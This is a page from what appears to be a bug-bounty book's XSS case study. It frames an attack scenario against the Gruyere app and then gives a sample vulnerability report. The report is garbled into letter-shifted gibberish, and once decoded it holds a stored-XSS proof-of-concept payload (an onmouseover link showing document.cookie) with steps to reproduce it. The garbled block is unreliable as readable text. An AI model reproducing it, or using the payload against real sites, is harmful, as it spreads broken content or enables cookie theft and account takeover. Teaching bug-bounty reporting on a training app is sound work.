Unsanitized Data – An XSS Case Study                                 Chapter 4

            Attack Scenario

            Coming up with a good attack scenario isn't as necessary as the previous data points, but
            can be a great method for increasing the bug's severity and boosting your payout.
            For this attack, we'll highlight the extent of the damage beyond just the Gruyere app. If an
            attacker could execute arbitrary JavaScript from a stored XSS bug, they could exfiltrate
            sensitive cookies, such as those for authenticating financial apps (banks, brokers, and
            crypto traders) or social networks (Twitter, Facebook, Instagram), which could in turn be
            used for identity theft, credit card fraud, and other cyber crimes.

            Here's how our report will look:

                $"5&(03:  1FSTJTUFOU   4UPSFE 944
                5*.&       ".        65$

                63-
                IUUQT   HPPHMF HSVZFSF BQQTQPU DPN                         OFXTOJQQFU HUM

                1":-0"%   B PONPVTFPWFS  BMFSU EPDVNFOU DPPLJF   YYT MJOL  B

                .&5)0%0-0(:  944 QBZMPBE TVCNJUUFE NBOVBMMZ
                */4536$5*0/4 50 3&130%6$&

                   /BWJHBUF UP  /FX 4OJQQFU  TVCNJTTJPO QBHF
                   &OUFS UIF 944 QBZMPBE JOUP UIF  /FX 4OJQQFU  GPSN
                   $MJDL  4VCNJU  BOE DSFBUF B OFX TOJQQFU
                   5IF NBMJDJPVT 944 DPOUBJOFE JO UIF QBZMPBE JT FYFDVUFE XIFOFWFS TPNFPOF
                IPWFST PWFS UIF TOJQQFU XJUI UIBU MJOL
                "55"$, 4$&/"3*0
                8JUI B QFSTJTUFOU 944 WVMOFSBCJMJUZ UP FYQMPJU  B NBMJDJPVT BDUPS DPVME
                FYGJMUSBUF TFOTJUJWF DPPLJFT UP TUFBM UIF JEFOUJUZ PG (SVZFSF T VTFST
                JNQFSTPOBUJOH UIFN CPUI JO UIF BQQ BOE JO XIBUFWFS PUIFS BDDPVOUT UIFZ BSF
                MPHHFE JOUP BU UIF UJNF PG UIF 944 TDSJQU T FYFDVUJPO















                                                    [ 71 ]